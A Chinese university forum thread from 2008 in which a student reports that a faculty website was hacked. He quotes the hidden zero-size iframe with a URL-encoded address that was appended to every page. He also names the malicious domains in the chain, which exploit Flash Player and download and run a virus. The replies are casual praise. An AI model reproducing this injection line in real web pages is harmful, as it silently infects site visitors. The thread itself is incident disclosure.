和山论坛

 找回密码
 会员注册
查看: 7108|回复: 123
打印 上一主题 下一主题

再次对学校网管的安全意识没想法

[复制链接]
跳转到指定楼层
楼主
发表于 2008-9-4 21:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
(以下红色部分请勿轻易点击,否则后果自负)


浙科院机械学院网站 http://jdx.zust.edu.cn 被黑客入侵

网站内所有网页文件(ASP,HTM,HTML....)的末尾被添加了一句代码:

<iframe src=http://%61%76%65%31%2E%63%6 width=0 height=0></iframe>(意思是加载一个宽度和高度都为0也就是看不到的网页,最常用的挂马方式之一)


继续追查得到的信息:

http://%61%76%65%31%2E%63%6解析后的地址为http://ave1.cn

此网站中用iframe加载了另外两个恶意页面(见图一)

http://jzm015.cn/ilink.html能自动检测机器的Flash Player的版本然后利用各版本的漏洞加载不同的恶意SWF文件(见图二)

http://www.hxg006.cn/b2.htm 中包含一个加密的1936348.js和一个加密的fxx.htm ,作用是下载并执行病毒和跳转到新的恶意网站

很流行的手段,没必要继续看下去了



再次没想法.....彻底失望....%@24



网站里的所有恶意代码我已经删了,现在可以安全访问了...










沙发
发表于 2008-9-4 21:31 | 只看该作者
lz是??好像很牛X的~%@28
板凳
发表于 2008-9-4 21:32 | 只看该作者
LZqiang da
地板
发表于 2008-9-4 21:32 | 只看该作者
小猪又被你发现了,好像不是第一次,了,N次了都%@24
5
发表于 2008-9-4 21:32 | 只看该作者
%@15 看不懂。。。
但LZ好像很厉害的样子
6
 楼主| 发表于 2008-9-4 21:32 | 只看该作者
原帖由 左手无名指 于 2008-9-4 21:31 发表
lz是??好像很牛X的~%@28


大二机械的%@07
7
发表于 2008-9-4 21:33 | 只看该作者
酷酷猪,名字真酷~%@101
8
 楼主| 发表于 2008-9-4 21:34 | 只看该作者
原帖由 小熊寶寶 于 2008-9-4 21:32 发表
小猪又被你发现了,好像不是第一次,了,N次了都%@24



才两次...不过学校犯的都是很低级的毛病..所以很不爽...
9
 楼主| 发表于 2008-9-4 21:34 | 只看该作者
MS图片不能显示??
10
发表于 2008-9-4 21:34 | 只看该作者
原帖由 kucoolzhu 于 2008-9-4 21:32 发表


大二机械的%@07
对你有印象了,以前在挖坟是看到你的帖~~%@07
11
 楼主| 发表于 2008-9-4 21:35 | 只看该作者
原帖由 左手无名指 于 2008-9-4 21:34 发表
对你有印象了,以前在挖坟是看到你的帖~~%@07


版主带头挖坟...%@15
12
发表于 2008-9-4 21:36 | 只看该作者
原帖由 kucoolzhu 于 2008-9-4 21:35 发表


版主带头挖坟...%@15
那是以前的事,嘘,不要张扬出去~~%@52
13
发表于 2008-9-4 21:37 | 只看该作者
很强大 基本看不懂~
14
发表于 2008-9-4 21:38 | 只看该作者
原帖由 kucoolzhu 于 2008-9-4 21:32 发表


大二机械的%@07

高数23分,想去计算机的那个%@08
15
 楼主| 发表于 2008-9-4 21:38 | 只看该作者
原帖由 左手无名指 于 2008-9-4 21:36 发表
那是以前的事,嘘,不要张扬出去~~%@52


百度贴吧见过某人在07年把自己05年的坟挖出来还说,我以前也有过类似楼主的疑问...
您需要登录后才可以回帖 登录 | 会员注册

本版积分规则


浙江科技学院和山论坛|手机客户端|小黑屋|和山论坛

GMT+8, 2025-5-11 06:53 , Processed in 0.121069 second(s), 24 queries , Gzip On.

Powered by Discuz! X3.2

© 2005-2019 和山论坛(www.hsbbs.com)

快速回复 返回顶部 返回列表